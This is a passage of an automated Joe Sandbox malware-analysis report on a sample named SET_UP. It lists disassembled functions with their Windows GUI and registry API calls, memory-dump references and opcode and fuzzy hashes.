                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: DrawImageList_$CopyRect
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 3723961100-0
                                                                                                                                                                                                  • Opcode ID: 555705f4f0c87be4cc8931df0e6d3fcefdcb7f9c41f38f94ceeb931e20afb7c2
                                                                                                                                                                                                  • Instruction ID: 67b1a97e49a141fae833425fd5853230c720c4434cce9e144de813f56f1c1e14
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 555705f4f0c87be4cc8931df0e6d3fcefdcb7f9c41f38f94ceeb931e20afb7c2
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 56713671A01208AFDB14DFA9CD85EAEBBB6FB48700F20902EE505A7264D774AD01CB58
                                                                                                                                                                                                  Function 0041185F Relevance: 7.7, APIs: 5, Instructions: 154windowCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • __EH_prolog.LIBCMT ref: 00411864
                                                                                                                                                                                                  • CopyRect.USER32(?,?), ref: 00411887
                                                                                                                                                                                                    • Part of subcall function 00411B2E: GetBkMode.GDI32(?), ref: 00411B49
                                                                                                                                                                                                    • Part of subcall function 00411B2E: GetBkColor.GDI32(?), ref: 00411B55
                                                                                                                                                                                                    • Part of subcall function 00411B2E: GetTextColor.GDI32(?), ref: 00411B61
                                                                                                                                                                                                    • Part of subcall function 00411B2E: GetParent.USER32(?), ref: 00411B6D
                                                                                                                                                                                                    • Part of subcall function 00411B2E: GetWindowRect.USER32(?,?), ref: 00411B82
                                                                                                                                                                                                    • Part of subcall function 00411B2E: SendMessageW.USER32(?,00000014,?,00000000), ref: 00411BAE
                                                                                                                                                                                                    • Part of subcall function 004B33E0: GetWindowTextLengthW.USER32(?), ref: 004B33ED
                                                                                                                                                                                                    • Part of subcall function 004B33E0: GetWindowTextW.USER32(?,00000000,00000000), ref: 004B3405
                                                                                                                                                                                                  • InflateRect.USER32(?,000000FE,00000000), ref: 004118DF
                                                                                                                                                                                                  • GetTextColor.GDI32(00000000), ref: 004118F8
                                                                                                                                                                                                    • Part of subcall function 00404B16: SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00404B1F
                                                                                                                                                                                                  • DrawFocusRect.USER32(00000000,?), ref: 004119DE
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: RectText$ColorWindow$MessageSend$CopyDrawFocusH_prologInflateLengthModeParent
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 4021768022-0
                                                                                                                                                                                                  • Opcode ID: 909d0920ff87ec7cedde6dcd51d2e474c093357a476379258c636b7346a0de42
                                                                                                                                                                                                  • Instruction ID: 59680d0b653bdf87441a6cc3697c270b77b30e75866dcff9f118049dc8f38c7b
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 909d0920ff87ec7cedde6dcd51d2e474c093357a476379258c636b7346a0de42
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 75518271A00624DFCF00DFA5C894AEEB7B6FF49310F000529F912AB291CB75AD45CB94
                                                                                                                                                                                                  Function 004A594E Relevance: 7.7, APIs: 5, Instructions: 154COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: b6ea94eb80f45f845df2c0ee9969226ebcc520070034f27e15e8891b8ec0ea64
                                                                                                                                                                                                  • Instruction ID: 4cfbc2678b9a891a1cf244c01c6353cec9656a4cce27014532e98311a08ef555
                                                                                                                                                                                                  • Opcode Fuzzy Hash: b6ea94eb80f45f845df2c0ee9969226ebcc520070034f27e15e8891b8ec0ea64
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2051D07170094AFFDF209F509EC08BF3B79EB66314B24826BF911862A0D7389D85DB59
                                                                                                                                                                                                  Function 0049C6C6 Relevance: 7.6, APIs: 5, Instructions: 150COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetStartupInfoA.KERNEL32(?), ref: 0049C724
                                                                                                                                                                                                  • GetFileType.KERNEL32(?,?,00000000), ref: 0049C7CF
                                                                                                                                                                                                  • GetStdHandle.KERNEL32(-000000F6,?,00000000), ref: 0049C832
                                                                                                                                                                                                  • GetFileType.KERNEL32(00000000,?,00000000), ref: 0049C840
                                                                                                                                                                                                  • SetHandleCount.KERNEL32 ref: 0049C877
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: FileHandleType$CountInfoStartup
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 1710529072-0
                                                                                                                                                                                                  • Opcode ID: 2a32b33c9e7c8166c64584156b4995ee3eaf34c4501c533e1c1add4a4da5f200
                                                                                                                                                                                                  • Instruction ID: 9ebf26bda1f0b6cfc2835b24848a257de5314e1268d89404b6ca4aa76ebc55cb
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2a32b33c9e7c8166c64584156b4995ee3eaf34c4501c533e1c1add4a4da5f200
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 035147715002168FDF20DB68C8C476A7FE4AB11369F2846BEC5A2D73E1D7389809DB59
                                                                                                                                                                                                  Function 00410D6F Relevance: 7.6, APIs: 5, Instructions: 91windowCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • __EH_prolog.LIBCMT ref: 00410D74
                                                                                                                                                                                                  • GetParent.USER32(?), ref: 00410DB5
                                                                                                                                                                                                  • SendMessageW.USER32(?,00000464,00000104,00000000), ref: 00410DDD
                                                                                                                                                                                                  • GetParent.USER32(?), ref: 00410E06
                                                                                                                                                                                                  • SendMessageW.USER32(?,00000465,00000104,00000000), ref: 00410E23
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: MessageParentSend$H_prolog
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 1056721960-0
                                                                                                                                                                                                  • Opcode ID: c0b88c942b8de02ecb85783ea4e7dfca86b453000321e897654f1145c8df8f36
                                                                                                                                                                                                  • Instruction ID: 0bd33bcd6470c7d8756287717a344b3b8ca1e57941b1ad2b193c3602983cb69d
                                                                                                                                                                                                  • Opcode Fuzzy Hash: c0b88c942b8de02ecb85783ea4e7dfca86b453000321e897654f1145c8df8f36
                                                                                                                                                                                                  • Instruction Fuzzy Hash: C131B0709002199BCB04EBA2CD95EFEB774FF00318F40052EB821A71E1DB7C9A41CA68
                                                                                                                                                                                                  Function 004B4E8C Relevance: 7.6, APIs: 5, Instructions: 91windowCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • __EH_prolog.LIBCMT ref: 004B4E91
                                                                                                                                                                                                  • GetTopWindow.USER32(?), ref: 004B4EB8
                                                                                                                                                                                                  • GetDlgCtrlID.USER32(00000000), ref: 004B4ECD
                                                                                                                                                                                                  • SendMessageW.USER32(?,00000087,00000000,00000000), ref: 004B4F26
                                                                                                                                                                                                  • GetWindow.USER32(00000000,00000002), ref: 004B4F61
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Window$CtrlH_prologMessageSend
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 4125289812-0
                                                                                                                                                                                                  • Opcode ID: 5e479daf8a133c64e461de8a6fb4307a77dd0aa0a5d151378c97b7c9a0043245
                                                                                                                                                                                                  • Instruction ID: 30ea09b37372e785d813717d0e88ca8b46258bab8bff14025c2cf735ef20b4cb
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5e479daf8a133c64e461de8a6fb4307a77dd0aa0a5d151378c97b7c9a0043245
                                                                                                                                                                                                  • Instruction Fuzzy Hash: C831B471900154AFCF25EBA6D985DFEBB78EF94314F20022FF425A7296E7384D01CA68
                                                                                                                                                                                                  Function 004C5CC8 Relevance: 7.6, APIs: 5, Instructions: 69registryCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • __EH_prolog.LIBCMT ref: 004C5CCD
                                                                                                                                                                                                  • RegOpenKeyW.ADVAPI32(?,?,?), ref: 004C5CE6
                                                                                                                                                                                                  • RegEnumKeyW.ADVAPI32(?,00000000,?,000000FF), ref: 004C5D0F
                                                                                                                                                                                                  • RegDeleteKeyW.ADVAPI32(?,?), ref: 004C5D78
                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(?), ref: 004C5D83
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: CloseDeleteEnumH_prologOpen
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 3131381098-0
                                                                                                                                                                                                  • Opcode ID: 90f48792a0322c7c3b7a7e0eacf69b3b41176ff1f2d022d07424cfbe46f18601
                                                                                                                                                                                                  • Instruction ID: 650d23d8d6b62e4c39f779aa9618499663bdfa95d3a4ba4834dc333efb42f1f4
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 90f48792a0322c7c3b7a7e0eacf69b3b41176ff1f2d022d07424cfbe46f18601
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3F216D72C0052AAFDF61DB95C845FFEBB78EF14350F0041AAE815A7260C734AE859BE4
                                                                                                                                                                                                  Function 004C0CA9 Relevance: 7.6, APIs: 5, Instructions: 68windowCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • SetFocus.USER32(00000000,00000000), ref: 004C0CC5
                                                                                                                                                                                                  • GetParent.USER32(?), ref: 004C0CD3
                                                                                                                                                                                                  • GetActiveWindow.USER32 ref: 004C0D1F
                                                                                                                                                                                                  • SendMessageW.USER32(?,00000006,00000001,00000000), ref: 004C0D30
                                                                                                                                                                                                  • SendMessageW.USER32(?,00000086,00000001,00000000), ref: 004C0D45
                                                                                                                                                                                                    • Part of subcall function 004B57E9: EnableWindow.USER32(?,?), ref: 004B57F7
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: MessageSendWindow$ActiveEnableFocusParent
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 3951091596-0
                                                                                                                                                                                                  • Opcode ID: c9d8f9f3469bf7fde898956c24d19993a4980738e793527dbc377dcc4b2ff6fc
                                                                                                                                                                                                  • Instruction ID: 463bda535b3ab21e5cff519662ba95e28e444c93400d54b2ce82bf0e6d44a165
                                                                                                                                                                                                  • Opcode Fuzzy Hash: c9d8f9f3469bf7fde898956c24d19993a4980738e793527dbc377dcc4b2ff6fc
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8B11B179200740DBD7705BA58C84F6BB6E99F54704F144A2EF6879A2E1CB78BC00861C
                                                                                                                                                                                                  Function 004C0D5F Relevance: 7.6, APIs: 5, Instructions: 65windowCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                    • Part of subcall function 004B5633: GetWindowLongW.USER32(?,000000F0), ref: 004B563F
                                                                                                                                                                                                  • SendMessageW.USER32(?,00000086,00000001,00000000), ref: 004C0DB5
                                                                                                                                                                                                  • SendMessageW.USER32(?,00000086,00000000,00000000), ref: 004C0DC9
                                                                                                                                                                                                  • GetDesktopWindow.USER32 ref: 004C0DCD
                                                                                                                                                                                                  • GetWindow.USER32(00000000), ref: 004C0DDA
                                                                                                                                                                                                  • SendMessageW.USER32(00000000,0000036D,?,00000000), ref: 004C0DFB
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: MessageSendWindow$DesktopLong
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 2272707703-0
                                                                                                                                                                                                  • Opcode ID: 61fadce409803e1afb987534fe77f3347fea8d53d8425bef8e819dc3dba2c2c1
                                                                                                                                                                                                  • Instruction ID: 7c9253ad19e37ba50a202ae92a2bc77556730cf4f2c06b7e9f351d28a754eb92
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 61fadce409803e1afb987534fe77f3347fea8d53d8425bef8e819dc3dba2c2c1
                                                                                                                                                                                                  • Instruction Fuzzy Hash: D1118C35340B01F3E7721A55CC06F6FBA49AF41B94F04412EF6421A2D1CF99EC0192AE
                                                                                                                                                                                                  Function 004C1788 Relevance: 7.6, APIs: 5, Instructions: 57windowCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GlobalGetAtomNameW.KERNEL32(?,?,00000103), ref: 004C17EA
                                                                                                                                                                                                  • GlobalAddAtomW.KERNEL32(?), ref: 004C17F9
                                                                                                                                                                                                  • GlobalGetAtomNameW.KERNEL32(?,?,00000103), ref: 004C180F
                                                                                                                                                                                                  • GlobalAddAtomW.KERNEL32(?), ref: 004C1818
                                                                                                                                                                                                  • SendMessageW.USER32(?,000003E4,?,?), ref: 004C183C
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: AtomGlobal$Name$MessageSend
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 1515195355-0
                                                                                                                                                                                                  • Opcode ID: 4c1dc9bd690575041b6d6ca6c67351352d64ea15bd109ebf3aa7cecd83a5fb4c
                                                                                                                                                                                                  • Instruction ID: a0796be1959694f25e3f420d8aae7a1f1f63594d6a03ee67edad83632b9d665f
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4c1dc9bd690575041b6d6ca6c67351352d64ea15bd109ebf3aa7cecd83a5fb4c
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3E11A379900318AADB60EB69CC54FEBB3BDEF04700F00855AF56597162E778EE80CB64
                                                                                                                                                                                                  Function 0041CE46 Relevance: 7.6, APIs: 5, Instructions: 55registrystringCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • lstrlenW.KERNEL32(00000000), ref: 0041CE5D
                                                                                                                                                                                                  • RegOpenKeyW.ADVAPI32(?,00000000,?), ref: 0041CE76
                                                                                                                                                                                                  • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 0041CE92
                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(?), ref: 0041CEA2
                                                                                                                                                                                                  • RegDeleteKeyW.ADVAPI32(?,00000000), ref: 0041CEB0
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: CloseDeleteEnumOpenlstrlen
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 160701936-0
                                                                                                                                                                                                  • Opcode ID: 08bb9cd910a2e0403c5548eb065b3fb3ce7c408ef507596fd72cdb85bf557e4a
                                                                                                                                                                                                  • Instruction ID: fec72eb2167a08d9ef5902abc83e6c04dda35b234d6efb831f177485a0ccf9c4
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 08bb9cd910a2e0403c5548eb065b3fb3ce7c408ef507596fd72cdb85bf557e4a
                                                                                                                                                                                                  • Instruction Fuzzy Hash: B0015632150214BAEB216F23EC4DEDB3F6CEF91751F108036F81999191EB759942C6AC
                                                                                                                                                                                                  Function 004C08EC Relevance: 7.5, APIs: 5, Instructions: 44windowCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • PeekMessageW.USER32(?,?,00000367,00000367,00000003), ref: 004C090D
                                                                                                                                                                                                  • PostMessageW.USER32(?,00000367,00000000,00000000), ref: 004C0923
                                                                                                                                                                                                  • GetCapture.USER32 ref: 004C0925
                                                                                                                                                                                                  • ReleaseCapture.USER32 ref: 004C0930
